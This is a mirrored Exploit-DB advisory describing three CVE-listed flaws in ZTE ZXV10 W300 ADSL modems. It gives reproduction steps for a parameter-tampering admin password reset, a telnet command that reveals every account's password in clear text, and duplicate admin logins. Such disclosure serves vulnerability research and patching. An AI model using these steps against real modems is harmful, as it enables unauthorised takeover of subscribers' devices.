bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/38772.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

86 lines
No EOL
2.2 KiB
Text
Raw Permalink Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: [ZTE ADSL ZXV10 W300 modems - Multiple vulnerabilities]
# Discovered by: Karn Ganeshen
# Vendor Homepage: [www.zte.com.cn]
# Versions Reported: [W300V2.1.0f_ER7_PE_O57 and W300V2.1.0h_ER7_PE_O57]
*CVE-ID*:
CVE-2015-7257
CVE-2015-7258
CVE-2015-7259
*Note*: Large deployment size, primarily in Peru, used by TdP.
1 *Insufficient authorization controls*
*CVE-ID*: CVE-2015-7257
Observed in Password Change functionality. Other functions may be
vulnerable as well.
*Expected behavior:*
Only administrative 'admin' user should be able to change password for all
the device users. 'support' is a diagnostic user with restricted
privileges. It can change only its own password.
*Vulnerability:*
Any non-admin user can change 'admin' password.
*Steps to reproduce:*
a. Login as user 'support' password XXX
b. Access Password Change page - http://<IP>/password.htm
c. Submit request
d. Intercept and Tamper the parameter ­ username ­ change from 'support' to
'admin'
e. Enter the new password ­> old password is not requested ­> Submit
> Login as admin
-> Pwn!
2 *Sensitive information disclosure - clear-text passwords*
*CVE-ID*: CVE-2015-7258
Displaying user information over Telnet connection, shows all valid users
and their passwords in clear­-text.
*Steps to reproduce:*
$ telnet <IP>
Trying <IP>...
Connected to <IP>.
Escape character is '^]'.
User Access Verification
Username: admin
Password: <­­­ admin/XXX1
$sh
ADSL#login show <--­­­ shows user information
Username Password Priority
admin password1 2
support password2 0
admin password3 1
3 *(Potential) Backdoor account feature - **insecure account management*
*CVE-ID*: CVE-2015-7259
Same login account can exist on the device, multiple times, each with
different priority#. It is possible to log in to device with either of the
username/password combination.
It is considered as a (redundant) login support *feature*.
*Steps to reproduce:*
$ telnet <IP>
Trying <IP>...
Connected to <IP>.
Escape character is '^]'.
User Access Verification
User Access Verification
Username: admin
Password: <­--­­ admin/password3
$sh
ADSL#login show
Username Password Priority
admin password1 2
support password2 0
admin password3 1
+++++
--
Best Regards,
Karn Ganeshen
Reference in a new issue View git blame Copy permalink